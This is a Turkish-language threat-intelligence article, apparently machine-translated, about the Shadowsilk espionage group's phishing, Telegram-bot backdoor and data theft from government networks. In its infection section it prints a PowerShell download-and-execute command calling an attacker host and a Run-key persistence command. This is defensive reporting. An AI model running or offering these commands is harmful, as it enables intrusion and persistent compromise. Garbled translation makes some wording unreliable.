Shadowsilk ilk olarak 2023’ün sonlarında Orta Asya ve daha geniş APAC bölgesindeki hükümet kuruluşlarını hedefleyen sofistike bir tehdit kümesi olarak ortaya çıktı.
Bilinen kamu güvenlik açıklarından ve yaygın olarak mevcut penetrasyon testi çerçevelerinden yararlanan grup, veri pespiltrasyon kampanyalarını yüksek derecede otomasyon ve gizli ile düzenler.
İlk teslimatlar, şifre korumalı arşivler içeren kimlik avı e-postaları ile gerçekleştirildi; Yürütme üzerine, bunlar gizli bir komut ve kontrol kanalı kuran telgraf tabanlı bir arka kapı bıraktı.
Shadowsilk operasyonlarının hızlı bir şekilde çoğalması, bölgesel güvenlik ekipleri arasında artan incelemeye neden oldu.
2025’in başlarında, Grup-IB analistleri yenilenmiş Shadowsilk altyapısı ve güncellenmiş telgraf botları ve CVE-2024-27956 ve CVE-2018-7602 gibi kamu istismarları da dahil olmak üzere yeni bir uzlaşma göstergeleri patlaması tespit etti.
Araştırmacılar, rakiplerin araç setinin SQLMAP ve FSCAN gibi özel telgraf bot komut dosyalarıyla açık kaynaklı tarayıcıların harmanladığını ve keşif, yanal hareket ve toplu veri hırsızlığı yapabilen çok yönlü bir platform oluşturduğunu belirtti.
Bu hibrit yaklaşım, Shadowsilk’in serbestçe mevcut araçlar ve ısmarlama kötü amaçlı yazılımlar arasında sorunsuz bir şekilde değişmesine izin vererek tespit ve yanıt çabalarını karmaşıklaştırdı.
2025’in ortalarında, grubun etkisi yadsınamazdı: en az 35 hükümet ağı veri ihlalleri geçirirken, Shadowsilk’in sunucu görüntüsünün adli yakalanmaları çok dilli operatörler ve karmaşık web panel kontrol süitleri ortaya çıktı.
Mağdurlar, günlük zip arşivlerinde sönen çalıntı posta sunucusu dökümlerini, idari kimlik bilgilerini ve kritik zeka gözlemledi.
Bu kampanyaların sofistike olması, Shadowsilk’in küçük bir kimlik avı temelli aktörden kasıtlı evrimini, uzun süreli müdahaleleri sürdürebilen kalıcı, çok aşamalı bir tehdide dönüştürüyor.
.webp)
Grup-IB araştırmacıları, Shadowsilk’in operatörlerinin biri öncelikle Rusça konuşan ve diğer Çince konuşan iki alt grubu koruduğunu, ancak sanal varlıkları paylaşan paralel olarak çalıştığını belirtti.
Klavye düzenleri, masaüstü ekran görüntüleri ve Telegram komut geçmişlerinin analizi bu iki dilli operasyonel modelini doğruladı. Farklı takım tercihlerine rağmen, her iki fraksiyon da tutarlı bir hedefe birleşir: gizlice hassas bilgileri toplar ve geleneksel güvenlik kontrollerinden kaçar.
Enfeksiyon mekanizması ve kalıcılık
Shadowsilk’in enfeksiyon zinciri, resmi bir rapor veya satıcı bülteni olarak maskelenen bir fermuar arşivi sunan bir cazibe e -postasıyla başlar.
Çıkarılması ve yürütülmesi üzerine rev.exePowerShell tabanlı yük yükü, https://tpp.tj/BossMaster.txtçağırıyor:-
powershell -ExecutionPolicy Bypass -Command "(Invoke-WebRequest https://tpp.tj/BossMaster.txt).Content | iex"
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpTask /t REG_SZ /d 'powershell -ExecutionPolicy Bypass -command "(Invoke-WebRequest https://tpp.tj/iap.txt).Content | iex"' /fBu snippet sadece birincil arka kapıyı yüklemekle kalmaz, aynı zamanda bir Kayıt Defteri Anahtarı HKCU\Software\Microsoft\Windows\CurrentVersion\Run Yeniden başlatıldıktan sonra kalıcılığı sağlamak için.
.webp)
/www/html/gramm.ps1 (Kaynak-Grup-Ib)İkinci aşama senaryosu, /www/html/gramm.ps1BOT API’si aracılığıyla gelen komutları okuyan, keyfi kabuk talimatlarını yürüten ve sonuçları veya dosyaları doğrudan saldırganın telgraf sohbetine yükleyen bir telgraf bot döngüsünü uygular.
Kalıcılık mekanizması hem kayıt defteri otomatik hem de planlanan görevlerden yararlanır. Shadowsilk, aynı telgraf kanalı üzerinden ek modüller (metasploit yükler, kobalt grev işaretleri veya özel sıçan yürütülebilir ürünler) getiren minimalist bir indiriciyi rutin olarak dağıtır.
Sosyal mesajlaşma altyapısını geleneksel kötü amaçlı yazılım geri çağrıları ile iç içe geçirerek, Shadowsilk normalde bilinmeyen TCP veya HTTPS bağlantılarını işaretleyen ağ güvenlik araçlarını, kötü amaçlı trafiği meşru bot etkileşimlerine karıştırır.
Bu çift aşamalı enfeksiyon ve kalıcı arka kapı sayesinde Shadowsilk, uzun süreli erişimi sürdürerek veri toplama, kimlik bilgisi boşaltma ve arşivlenmiş kullanıcı belgelerinin saldırgan kontrolündeki uç noktalara sistematik olarak eksfiltrasyonunu sağlar.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.